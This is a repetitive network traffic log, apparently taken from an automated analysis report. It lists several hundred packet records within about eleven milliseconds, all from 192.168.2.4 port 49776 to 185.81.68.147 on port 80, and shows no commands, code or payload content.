                                                              Dec 13, 2024 07:47:45.849487066 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849514008 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849536896 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849561930 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849584103 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849608898 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849632025 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849659920 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849680901 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849711895 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849728107 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849754095 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849773884 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849802017 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849826097 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849852085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849869967 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849899054 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.849997997 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850032091 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850054979 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850083113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850106001 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850131989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850155115 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850178957 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850198984 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850229025 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850301981 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850333929 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850357056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850383043 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850404024 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850431919 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850454092 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850482941 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850507021 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850533962 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850553989 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850581884 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850601912 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850629091 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850663900 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850692987 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850716114 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850804090 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850804090 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850828886 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850848913 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850878000 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850945950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.850977898 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851000071 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851027012 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851048946 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851078033 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851099014 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851130962 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851156950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851186037 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851205111 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851233006 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851402044 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851432085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851454973 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851480961 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851501942 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851532936 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851557970 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851588011 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851615906 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851644039 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851665974 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851696014 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851717949 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851744890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851766109 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851793051 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851813078 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851845026 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851867914 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851900101 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851919889 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851948023 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.851977110 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852005959 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852026939 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852052927 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852077007 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852106094 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852123976 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852152109 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852170944 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852197886 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852221012 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852354050 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852399111 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852426052 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852456093 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852483988 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852552891 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852576017 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852603912 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852626085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852689981 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852711916 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852737904 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852762938 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852788925 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852811098 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852842093 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852905035 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852938890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852966070 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.852993965 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853013992 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853040934 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853063107 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853089094 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853111029 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853137016 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853161097 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853187084 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853214979 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853388071 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853411913 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853446007 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853470087 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853502035 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853526115 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853553057 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853573084 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853599072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853621006 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853648901 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853671074 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853701115 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853720903 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853754044 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853775978 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853806019 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853837967 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853868961 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853888988 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853916883 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853936911 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853964090 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.853984118 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854011059 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854037046 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854063034 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854083061 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854114056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854132891 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854165077 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854264021 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854293108 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854315042 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854381084 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854409933 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854437113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854496956 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854525089 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854549885 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854638100 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854676962 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854698896 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854727030 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854757071 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854927063 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854948997 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854975939 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.854998112 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855029106 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855051041 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855083942 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855107069 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855139017 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855159998 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855189085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855282068 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855309010 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855339050 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855360985 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855428934 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855458975 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855479956 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855506897 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855529070 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855557919 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855582952 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855613947 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855675936 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855705976 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855725050 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855752945 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855813026 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855843067 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855866909 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855921984 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.855950117 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856139898 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856168032 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856189013 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856219053 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856244087 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856271982 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856291056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856317043 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856338978 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856364965 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856386900 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856414080 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856503963 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856535912 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856558084 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856586933 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856607914 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856640100 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856666088 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856693983 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856714964 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856740952 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856760979 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856789112 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856812000 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856837034 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856861115 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856888056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856921911 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856949091 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.856970072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857007027 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857070923 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857103109 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857126951 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857213020 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857254982 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857319117 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857352972 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857374907 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857402086 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857423067 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857450962 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857620001 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857651949 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857676983 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857709885 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857734919 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857764006 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857784033 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857810020 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857836008 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857865095 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857886076 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857911110 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857930899 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857958078 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.857979059 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858010054 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858031988 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858058929 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858082056 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858109951 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858134031 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858159065 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858181000 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858206987 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858227968 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858254910 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858274937 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858300924 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858320951 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858346939 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858372927 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858405113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858426094 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858452082 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858474016 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858500957 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858520031 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858549118 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858566999 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858592987 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858614922 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858639956 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858661890 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858686924 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858712912 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858745098 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858766079 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858795881 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858814955 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858844995 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858866930 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858894110 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858913898 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.858941078 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859035969 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859066010 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859086037 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859153032 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859206915 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859245062 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859304905 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859338045 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859359980 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859385967 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859476089 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859476089 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859498978 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859519005 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859546900 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859570026 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859601974 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859875917 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859915972 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859950066 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.859982967 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860008955 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860038996 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860059977 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860086918 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860109091 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860137939 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860167027 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860269070 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860289097 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860317945 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860414028 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860414028 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860445976 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860513926 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860543966 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860565901 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860595942 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860661030 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860691071 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860711098 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860743999 CET4977680192.168.2.4185.81.68.147
